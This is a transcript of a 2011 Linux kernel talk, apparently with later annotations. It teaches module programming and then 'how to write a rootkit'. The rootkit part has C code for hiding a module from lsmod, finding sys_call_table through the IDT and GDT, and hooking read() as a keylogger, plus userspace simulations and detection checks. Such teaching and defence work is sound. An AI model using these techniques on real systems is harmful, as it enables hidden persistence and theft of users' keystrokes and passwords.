2011 01 19 kernel hacking

Upload: ravichandra-v

Post on 06-Apr-2018


TRANSCRIPT

  • 8/2/2019 2011 01 19 Kernel Hacking

    1/28

    Kernel Hacking: Introduction to Linux Kernel 2.6

    How to write a Rootkit

    Maurice Leclaire

    TumFUG Linux / Unix get-together

    January 19, 2011


    Why hack the kernel?

    Understanding the Linux kernel

    Fixing bugs

    Adding special features

    Writing drivers for special hardware

    Writing rootkits


    How to hack the kernel?

    Modifying the source code
      all modifications are possible
      needs a kernel recompile

    Writing a LKM (Loadable Kernel Module)
      no kernel recompile
      can be inserted into a running kernel
      no influence on the boot process
      restrictions due to the kernel: a module can only link against exported symbols and must be built for exactly the running kernel


    How to get started?

    Knowledge of the C Programming Language

    Kernel source (e.g. kernel.org)

    Compiler

    Recommended:

    Vanilla Kernel

    Virtual machine for testing

    Assembler knowledge


    How to get started?

    http://lxr.linux.no (complete source code cross reference)

    http://people.netfilter.org/~rusty/unreliable-guides/kernel-hacking/lk-hacking-guide.html (Rusty's Kernel Hacking Guide)

    http://www.faqs.org/docs/kernel (LKM Programming Guide)

    http://kernelnewbies.org/KernelHacking

    Coding Style (Documentation/CodingStyle)

    "First off, I'd suggest printing out a copy of the GNU coding standards, and NOT read it. Burn them, it's a great symbolic gesture."

    8 chars indentation

    only one statement on a single line

    never use spaces for indentation (tabs only)

    80 chars is max line length

    printk (include/linux/kernel.h)

    Kernel log function

    used like userspace printf; output lands in the kernel log (read it with dmesg)

    printk("Hello world!\n");
    printk(KERN_INFO "%s %i\n", mystring, myint);

    loglevel: a string literal concatenated in front of the format, one of KERN_DEBUG, KERN_INFO, KERN_NOTICE, KERN_WARNING, KERN_ERR, KERN_CRIT, KERN_ALERT, KERN_EMERG; without one the kernel's default level applies

    kmalloc/kfree, vmalloc/vfree (include/linux/slab.h, include/linux/vmalloc.h)

    kmalloc allocates kernel memory that is physically contiguous

    rule of thumb: up to 128 KB per allocation (the exact cap depends on architecture and page size)

    void *mem = kmalloc(size, GFP_KERNEL);
    kfree(mem);

    GFP_KERNEL may sleep; use GFP_ATOMIC from interrupt context

    vmalloc can allocate more than 128 KB

    virtual memory / non contiguous in RAM (page tables are set up for it, so it is slower)

    void *mem = vmalloc(size);
    vfree(mem);

    kzalloc / vzalloc for zeroed memory

    Always check the returned pointer for NULL

    Kernel List Structure (include/linux/list.h)

    doubly linked list

    circular

    type oblivious

    the list does not contain the items, the items contain the list

    multiple lists in one item possible

    struct my_struct {
            ...
            struct list_head list;
            ...
            struct list_head another_list;
    };

    Kernel List Structure (include/linux/list.h)

    struct list_head *p, *q;
    struct my_struct x, *pos;

    LIST_HEAD(head);

    list_add(&x.list, &head);

    list_for_each(p, &head) {
            pos = list_entry(p, struct my_struct, list);
            ...
    }
    /* identical to */
    list_for_each_entry(pos, &head, list) { ... }

    /* the _safe variant keeps the next pointer in q, so the current
       entry may be unlinked inside the loop body */
    list_for_each_safe(p, q, &head) {
            list_del(p);
    }

    Communication with the Userspace

    In Linux everything is a file

    Communication is also done via files

    For that purpose there are /proc, /sys and /dev files

    They exist only in RAM: /proc and /sys are virtual filesystems whose contents are generated by the kernel when they are read

    Creating a /dev file (include/linux/fs.h)

    static struct file_operations fops = {
            .read = device_read,
            .write = device_write,
            .open = device_open,
            .release = device_release
    };

    /* major 0: let the kernel pick a free major number; it is returned, negative on failure */
    int major = register_chrdev(0, "mydev", &fops);
    unregister_chrdev(major, "mydev");

    register_chrdev only registers the driver for a major number; the node itself is created with mknod /dev/mydev c <major> 0, or by udev once the driver also registers a class device

    Reading/Writing files from Kernelspace (include/linux/fs.h, include/asm/uaccess.h)

    You normally shouldn't do this

    Use /proc, /sys or /dev files for communication with the userspace

    struct file *file;
    file = filp_open("/dir/filename", O_RDWR, 0);

    if (!IS_ERR(file)) {                     /* filp_open returns an ERR_PTR on failure, never NULL */
            mm_segment_t old_fs = get_fs();
            set_fs(KERNEL_DS);               /* let vfs_read/vfs_write accept a kernel buffer */
            loff_t file_size = vfs_llseek(file, (loff_t)0, SEEK_END);
            char *buff = vmalloc(file_size);
            loff_t off = 0;
            vfs_read(file, buff, file_size, &off);
            vfs_write(file, buff, file_size, &off);   /* off has advanced: this appends a copy */
            vfree(buff);
            set_fs(old_fs);
            filp_close(file, NULL);
    }

    This is 2.6-era code: set_fs()/KERNEL_DS are gone from current kernels (removed from x86 in 5.10) and vfs_read/vfs_write are no longer exported to modules; kernel_read()/kernel_write() serve the same purpose today

    Loadable Kernel Module

    Object file that can be linked into the running kernel

    Dynamically load and unload drivers as you need them

    lsmod lists the loaded modules

    Hello World LKM (hello_world.c)

    #include <linux/kernel.h>
    #include <linux/module.h>

    int init_module(void)
    {
            printk("TumFUG: Hello world!\n");
            return 0;                /* non-zero makes insmod fail */
    }

    void cleanup_module(void)
    {
            printk("TumFUG: Goodbye!\n");
    }

    init_module/cleanup_module are the legacy entry-point names; the module_init()/module_exit() macros let you use your own function names

    Hello World LKM (Makefile)

    obj-m += hello_world.o

    all:
    	make -C /lib/modules/$(shell uname -r)/build M=$(PWD) modules

    clean:
    	make -C /lib/modules/$(shell uname -r)/build M=$(PWD) clean

    (recipe lines start with a tab; the module is built against the headers of the running kernel)

    Hello World LKM (Compiling and Loading)

    # make
    # insmod hello_world.ko
    TumFUG: Hello world!
    # rmmod hello_world
    TumFUG: Goodbye!
    # dmesg | grep TumFUG
    TumFUG: Hello world!
    TumFUG: Goodbye!
    # _

    Module Documentation

    MODULE_LICENSE("GPL");
    MODULE_AUTHOR("TumFUG");
    MODULE_DESCRIPTION("Hello world module");

    A module should contain these macros for documentation purposes

    The license macro avoids a warning message when loaded: a module without a GPL-compatible license taints the kernel and cannot use symbols exported with EXPORT_SYMBOL_GPL

    Use Counter

    Prevents the module from being unloaded while it is in use

    void open(void)
    {
            if (!try_module_get(THIS_MODULE))   /* fails if the module is already being unloaded */
                    return;
            ...
    }

    void close(void)
    {
            ...
            module_put(THIS_MODULE);
    }

    (The slide calls the release function put_module; the kernel's function is module_put. For a character device, setting .owner = THIS_MODULE in struct file_operations makes the VFS take and drop the reference for you.)

    Rootkits (LKM-based Rootkits)

    Software that lives in kernel space

    Hides itself from the sysadmin

    Enables privileged access to the system for non-privileged users

    Is typically installed by an attacker after breaking into a system (loading a module already needs root, so the rootkit preserves access rather than gaining it)

    Hides all the attacker's actions

    Keylogger

    Hiding the Module

    The kernel holds a list of all modules

    Removing the module from this list is enough to hide it from lsmod and /proc/modules, which are generated from that list

    list_del(&THIS_MODULE->list);

    Two consequences worth knowing: the module stays visible under /sys/module/<name> unless its kobject is removed as well, so comparing /proc/modules with /sys/module is a cheap detection check; and because rmmod looks the module up in the same list, a hidden module can no longer be unloaded

    Hiding processes is similar

    task structure is more complex

    More lists to remove from: a task_struct is linked into several lists (the task list, the pid hash, ...) and all of them must be handled consistently, or the kernel eventually dereferences a stale pointer

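    The list slides (Kernel List Structure) and the list_del(&THIS_MODULE->list) trick above, as an added example that is not part of the slides and not kernel code: a userspace re-creation of the list.h pattern (container_of, list_add, list_del with pointer poisoning) applied to a stand-in struct module that carries only a name and a list node. The names module_list, demo_hide, count_modules and the three module names are this example's own assumptions. It compiles with any C compiler and shows that after list_del the module is gone from the traversal lsmod relies on, while the struct itself is untouched and its list pointers are poisoned, which is exactly why a hidden module can no longer be rmmod'ed.

```c
#include <stdbool.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* Userspace re-creation of the include/linux/list.h idea (added example,
 * not the kernel's code): the node lives inside the item and container_of()
 * recovers the item from the node. Removed nodes are poisoned as the kernel
 * does, so a later traversal through them faults instead of wandering. */
struct list_head {
        struct list_head *next, *prev;
};

#define container_of(ptr, type, member) \
        ((type *)((char *)(ptr) - offsetof(type, member)))
#define LIST_HEAD(name) struct list_head name = { &(name), &(name) }
#define list_for_each(pos, head) \
        for ((pos) = (head)->next; (pos) != (head); (pos) = (pos)->next)
#define LIST_POISON1 ((struct list_head *)0x100)
#define LIST_POISON2 ((struct list_head *)0x200)

static void INIT_LIST_HEAD(struct list_head *head)
{
        head->next = head->prev = head;
}

static void list_add(struct list_head *entry, struct list_head *head)
{
        entry->next = head->next;
        entry->prev = head;
        head->next->prev = entry;
        head->next = entry;
}

static void list_del(struct list_head *entry)
{
        entry->prev->next = entry->next;
        entry->next->prev = entry->prev;
        entry->next = LIST_POISON1;
        entry->prev = LIST_POISON2;
}

/* Stand-in for struct module with only the two fields this example needs
 * (the real one also carries a kobject, which is why /sys/module still
 * shows a module that was merely unlinked from the list). */
struct module {
        char name[32];
        struct list_head list;
};

static LIST_HEAD(module_list);    /* stands in for the kernel's "modules" list */

/* What lsmod / "cat /proc/modules" amounts to: walk the list. */
static size_t count_modules(const struct list_head *head)
{
        const struct list_head *p;
        size_t n = 0;

        list_for_each(p, head)
                n++;
        return n;
}

static bool module_listed(const struct list_head *head, const char *name)
{
        const struct list_head *p;

        list_for_each(p, head)
                if (strcmp(container_of(p, struct module, list)->name, name) == 0)
                        return true;
        return false;
}

/* Load three modules, then apply the slide's one-liner to the last one.
 * Returns how many modules remain visible; *hidden receives the unlinked
 * module, still allocated and running, just unreachable from the list. */
static size_t demo_hide(struct module **hidden)
{
        static struct module ext4 = { "ext4", { 0, 0 } };
        static struct module e1000 = { "e1000", { 0, 0 } };
        static struct module rootkit = { "rootkit", { 0, 0 } };

        INIT_LIST_HEAD(&module_list);
        list_add(&ext4.list, &module_list);
        list_add(&e1000.list, &module_list);
        list_add(&rootkit.list, &module_list);  /* newest module sits at the head */

        list_del(&rootkit.list);                 /* hide: unlink, never free */
        *hidden = &rootkit;
        return count_modules(&module_list);
}

int main(void)
{
        struct module *hidden;
        size_t visible = demo_hide(&hidden);

        printf("%zu modules visible; %s listed: %s\n", visible, hidden->name,
               module_listed(&module_list, hidden->name) ? "yes" : "no");
        return 0;
}
```

    The poisoned next/prev pointers are the kernel's behaviour too: a hidden module that later calls list_del again, or anything that walks through its node, will fault on 0x100/0x200 rather than corrupt memory silently.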

    System Calls

    requests to the kernel

    interface between userspace and kernelspace

    Program           idt                        sys_call_table
    ...               ...                        ...
    read() --int 0x80--> 0x80: sys_call -------> 2: sys_fork
    ...               ...   (sys call handler)   3: sys_read  -------> sys_read()
                                                 4: sys_write
                                                 ...

    System Call Hooking

    Change the pointer to a system call handler

    The hook function is executed instead of the original one

    Program           idt                        sys_call_table
    ...               ...                        ...
    read() --int 0x80--> 0x80: sys_call -------> 2: sys_fork
    ...               ...   (sys call handler)   3: hook_read -------> hook_read() (which can itself call sys_read())
                                                 4: sys_write
                                                 ...

    get control over the kernel's behaviour

    Problem: since 2.6 the address of sys_call_table is no longer exported, and a module can only link against exported symbols

    Solution: Find it yourself

    Caveats the slides leave out: the walk on the following slides is 32-bit x86 only (int 0x80, 4-byte table entries); on x86-64 the fast path enters through the syscall instruction and MSR_LSTAR, not the IDT. The table normally lives in read-only memory, so overwriting an entry additionally needs the page made writable (rootkits of this era clear CR0.WP for that), and the address can just as well be read from System.map or /proc/kallsyms.

    Finding the sys call table

    Get the IDT address with sidt

    Get the address of the sys_call_handler (system_call) from IDT entry 0x80: the base of the code segment named by the gate's selector (looked up in the GDT, address from sgdt) plus the gate's offset

    Interpret the machine code of the handler: its dispatch instruction call *sys_call_table(,%eax,4) carries the address of sys_call_table as a 32-bit displacement

    /* fragments to run from a module's init function on 32-bit x86;
       u8/u16/u32 come from <linux/types.h> */

    struct dt {
            u16 limit;
            u32 base;
    } __attribute__((__packed__));

    struct idt_entry {
            u16 offset_low;
            u16 selector;
            u8 zero;
            u8 attr;
            u16 offset_high;
    } __attribute__((__packed__));

    struct gdt_entry {
            u16 limit_low;
            u16 base_low;
            u8 base_mid;
            u8 access;
            u8 attr;
            u8 base_high;
    } __attribute__((__packed__));

    void **sys_call_table;

    struct dt gdt;
    __asm__("sgdt %0\n" : "=m"(gdt));

    struct dt idt;
    __asm__("sidt %0\n" : "=m"(idt));

    struct idt_entry *idt_entry = (struct idt_entry *)(idt.base);
    idt_entry += 0x80;                        /* 0x80: linux syscall gate */
    u32 syscall_offset = (idt_entry->offset_high << 16) | idt_entry->offset_low;

    struct gdt_entry *gdt_entry = (struct gdt_entry *)(gdt.base);
    gdt_entry += idt_entry->selector >> 3;    /* a selector is index << 3 | TI | RPL; the slide adds the raw selector and lands 8 entries too far per index */
    u32 syscall_base = (gdt_entry->base_high << 24)
                     | (gdt_entry->base_mid << 16) | gdt_entry->base_low;

    u8 *system_call = (u8 *)(syscall_base + syscall_offset);

    /* search for the dispatch into sys_call_table */
    /* FF 14 85 off4 : call *off4(,%eax,4)  (FF /2 is call, not jmp as the slide says) */
    while ((*(u32 *)(system_call++) & 0xFFFFFF) != 0x8514FF)
            ;                                 /* unbounded: relies on the pattern being present */

    /* the post-increment left system_call one past the FF byte,
       so the 32-bit displacement starts two bytes further on */
    sys_call_table = *(void ***)(system_call + 2);
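    The IDT/GDT walk and the opcode scan on the slides above, as an added example that is not the slides' own code and runs in userspace without a kernel: the same descriptor structs, the handler-address computation with the selector decoded correctly and both tables bounds-checked, and a bounded scan for the call *disp32(,%eax,4) dispatch. Because sgdt/sidt and the real handler bytes are only available inside a kernel, the IDT, the GDT and the handler bytes (sample_handler, with __KERNEL_CS = 0x60 and a table at 0xc05f3000) are constructed here; all function names are this example's own.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

typedef uint8_t u8;
typedef uint16_t u16;
typedef uint32_t u32;

/* 32-bit x86 descriptor layouts, as on the slides. */
struct idt_entry {
        u16 offset_low;
        u16 selector;
        u8 zero;
        u8 attr;
        u16 offset_high;
} __attribute__((__packed__));

struct gdt_entry {
        u16 limit_low;
        u16 base_low;
        u8 base_mid;
        u8 access;
        u8 attr;
        u8 base_high;
} __attribute__((__packed__));

/* Linear address of the int 0x80 handler: base of the code segment named by
 * the gate's selector, plus the gate's offset. A selector is not an index
 * (bits 15..3 index, bits 2..0 TI/RPL), hence the >> 3. Both tables come
 * with their sizes so a bogus gate cannot send the scan into unrelated
 * memory. Returns 0 when the gate is absent or out of range. */
static u32 syscall_handler_address(const struct idt_entry *idt, size_t idt_entries,
                                   const struct gdt_entry *gdt, size_t gdt_entries)
{
        const struct idt_entry *gate;
        const struct gdt_entry *seg;

        if (idt_entries <= 0x80)
                return 0;
        gate = &idt[0x80];
        if (!(gate->attr & 0x80) || (size_t)(gate->selector >> 3) >= gdt_entries)
                return 0;
        seg = &gdt[gate->selector >> 3];
        return (((u32)seg->base_high << 24) | ((u32)seg->base_mid << 16) | seg->base_low)
               + (((u32)gate->offset_high << 16) | gate->offset_low);
}

/* Scan handler code for "call *disp32(,%eax,4)" (FF 14 85 disp32) and return
 * disp32, i.e. the address of sys_call_table; 0 if absent. Bounded by len,
 * unlike the open-ended while loop on the slide. */
static u32 find_sys_call_table(const u8 *code, size_t len)
{
        size_t i;

        for (i = 0; i + 7 <= len; i++) {
                if (code[i] == 0xFF && code[i + 1] == 0x14 && code[i + 2] == 0x85) {
                        u32 disp;
                        memcpy(&disp, code + i + 3, sizeof disp);  /* little-endian */
                        return disp;
                }
        }
        return 0;
}

/* Constructed stand-in for the first bytes of system_call (not a real kernel
 * dump): prologue, range check, and the dispatch with the table at 0xc05f3000. */
static const u8 sample_handler[] = {
        0x50,                                     /* push  %eax */
        0xfc,                                     /* cld */
        0x3d, 0x54, 0x01, 0x00, 0x00,             /* cmp   $nr_syscalls,%eax */
        0x73, 0x06,                               /* jae   <badsys> */
        0xff, 0x14, 0x85, 0x00, 0x30, 0x5f, 0xc0, /* call  *0xc05f3000(,%eax,4) */
        0x89, 0x44, 0x24, 0x18,                   /* mov   %eax,0x18(%esp) */
};

/* Constructed tables: __KERNEL_CS = 0x60 (GDT index 12) with the given base,
 * and a present DPL-3 32-bit trap gate at 0x80 aimed at offset 0xc0103f20. */
static void build_tables(struct idt_entry *idt, struct gdt_entry *gdt, u32 seg_base)
{
        memset(idt, 0, 256 * sizeof *idt);
        memset(gdt, 0, 32 * sizeof *gdt);
        idt[0x80].selector = 0x60;
        idt[0x80].offset_low = 0x3f20;
        idt[0x80].offset_high = 0xc010;
        idt[0x80].attr = 0xef;
        gdt[12].base_low = seg_base & 0xffff;
        gdt[12].base_mid = (seg_base >> 16) & 0xff;
        gdt[12].base_high = seg_base >> 24;
}

/* The whole walk on constructed data. In a module the handler bytes would be
 * read at the computed address; here sample_handler stands in for them. */
static u32 demo_find_table(void)
{
        static struct idt_entry idt[256];
        static struct gdt_entry gdt[32];

        build_tables(idt, gdt, 0);               /* flat segment, base 0 */
        if (syscall_handler_address(idt, 256, gdt, 32) != 0xc0103f20u)
                return 0;
        return find_sys_call_table(sample_handler, sizeof sample_handler);
}

int main(void)
{
        printf("sys_call_table = 0x%08x\n", demo_find_table());
        return 0;
}
```

    On a real 32-bit Linux the kernel code segment has base 0, which is why the selector bug on the slide often goes unnoticed: it reads a wrong GDT entry but still gets 0 most of the time. The bounds checks and the length-limited scan are what turn the slide's sketch into something safe to run in a kernel that might not match expectations.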

    A simple Keylogger

    Hook the read system call

    Call the original read

    Log the value to the system log file

    /* saved from sys_call_table[__NR_read] when the hook is installed */
    static asmlinkage long (*original_read)(int fd, char *buf, long count);

    asmlinkage long hook_read(int fd, char *buf, long count)
    {
            long c = original_read(fd, buf, count);

            if (c > 0)
                    printk("%.*s\n", (int)c, buf);   /* read() returns a count, not a string: log exactly c bytes */

            return c;
    }

    buf is a userspace pointer; a real module copies the c bytes out with copy_from_user() before logging them, and usually filters on fd (stdin) or the controlling tty so the log is not flooded by every file read on the system

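    The pointer swap on the System Call Hooking slide and the hook on this slide, as an added example that is not part of the slides: a userspace model in which a function-pointer table plays sys_call_table, sys_read/sys_write are stand-ins that serve a constructed input line, hook_read wraps the original exactly as the slide does but logs only the bytes actually returned, and first_modified_entry is the defender-side check that goes with it (compare the live table to a trusted snapshot, as one would against System.map). Everything named here (pending_input, keylog, install_hook, demo_keylogger, the five-entry table) is this example's own assumption.

```c
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* Userspace model of the dispatch path (added example; no real kernel): the
 * "kernel" calls sys_call_table[nr](...) just as entry_32.S does with
 * call *sys_call_table(,%eax,4). */
typedef long (*syscall_fn)(int fd, char *buf, long count);

#define NR_READ 3
#define NR_WRITE 4

/* Stand-ins for sys_read/sys_write. sys_read serves a constructed line of
 * keystrokes; like the real read(), it returns a byte count and never
 * NUL-terminates the buffer. */
static const char *pending_input = "hunter2\n";    /* constructed input */

static long sys_read(int fd, char *buf, long count)
{
        long n = (long)strlen(pending_input);

        (void)fd;
        if (n > count)
                n = count;
        memcpy(buf, pending_input, (size_t)n);
        return n;
}

static long sys_write(int fd, char *buf, long count)
{
        (void)fd; (void)buf;
        return count;
}

static syscall_fn sys_call_table[] = { 0, 0, 0, sys_read, sys_write };
#define NR_SYSCALLS (sizeof sys_call_table / sizeof sys_call_table[0])

/* ---- rootkit side ---- */
static syscall_fn original_read;
static char keylog[256];           /* stands in for the printk log */

/* Transparent to the caller (same buffer, same return value) but records
 * exactly the c bytes that were read. The slide's printk("%s\n", buf) would
 * run past the data, since read() leaves no terminator; in a real module buf
 * is also a user pointer and must be fetched with copy_from_user(). */
static long hook_read(int fd, char *buf, long count)
{
        long c = original_read(fd, buf, count);
        size_t used = strlen(keylog);

        if (c > 0 && (size_t)c < sizeof keylog - used)
                snprintf(keylog + used, sizeof keylog - used, "%.*s", (int)c, buf);
        return c;
}

static void install_hook(void)
{
        if (sys_call_table[NR_READ] == hook_read)
                return;                            /* already installed */
        original_read = sys_call_table[NR_READ];
        sys_call_table[NR_READ] = hook_read;       /* the one-pointer swap from the slide */
}

/* ---- defender side ---- */
/* Compare the live table against a trusted snapshot (on a real system: the
 * addresses from System.map or a clean boot). Returns the index of the first
 * changed entry, or -1 when the table is intact. */
static int first_modified_entry(const syscall_fn *live, const syscall_fn *baseline, size_t n)
{
        size_t i;

        for (i = 0; i < n; i++)
                if (live[i] != baseline[i])
                        return (int)i;
        return -1;
}

/* Scenario: snapshot, install the hook, let a "process" read one line, then
 * audit the table. The line the process saw is copied into out. */
static int demo_keylogger(char *out, size_t outlen)
{
        syscall_fn baseline[NR_SYSCALLS];
        char buf[64];
        long c;

        memcpy(baseline, sys_call_table, sizeof baseline);
        keylog[0] = '\0';
        install_hook();

        c = sys_call_table[NR_READ](0, buf, sizeof buf);   /* the victim's read(0, ...) */
        snprintf(out, outlen, "%.*s", (int)c, buf);

        return first_modified_entry(sys_call_table, baseline, NR_SYSCALLS);
}

int main(void)
{
        char line[64];
        int hooked = demo_keylogger(line, sizeof line);

        printf("process read: %srootkit logged: %s", line, keylog);
        printf("first modified table entry: %d (sys_read is %d)\n", hooked, NR_READ);
        return 0;
}
```

    The snapshot has to predate the compromise: a baseline taken from an already hooked table reports nothing, which is why real checkers take the expected addresses from System.map or a known-good kernel rather than from the running system.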